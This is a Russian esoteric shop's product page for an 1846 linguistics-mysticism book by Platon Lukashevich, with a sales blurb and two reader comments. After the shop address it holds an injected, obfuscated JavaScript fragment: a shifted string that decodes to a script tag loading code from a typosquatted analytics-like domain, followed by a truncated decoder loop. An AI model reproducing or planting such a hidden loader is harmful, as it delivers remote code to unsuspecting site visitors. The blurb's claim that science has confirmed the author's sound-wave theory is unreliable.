Издательство  ПЕТРЬГОРОДЪ
Год  1846
ISBN 5-91464-010-8.
Объём 144 страницы.
Формат 70х100/16.
Твёрдая обложка

Магический магазин “Мистическая Гирлянда” представляет Вам книгу   П.Лукашевича  ”Чаромутие, или священный язык волхвов, жрецов и магов”.
«Чаромутие», или полностью «Чаромутие, или священный язык магов, волхвов и жрецов, открытый Платоном Лукашевичем, с прибавлением обращенных им же в прямую истоть чаромути и чарной истоти языков Русского и других славянских и части Латинского» — первая и главная работа Платона Акимовича о происхождении всех языков от первобытного праязыка, и их дальнейших превращениях.
Современная наука подтвердила уникальную догадку Платона Лукашевича, о том, что звуковые колебания, влияют на состояние человека, как в положительную так и в отрицательную сторону, в зависимости от длинны излучаемой звуковой волны. Звуковые колебания возбуждают или гасят нелинейные системы к осознанию и пониманию которых очень близко подошёл Платон Лукашевич.

Приобрести данную книгу Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8.
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Comments: 2

  1. Иван says:

    Лукашевич П.А.”Чаромутие, или священный язык волхвов, жрецов и магов , какая цена книги

  2. admin says:

    Звоните по контактным телефонам.

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>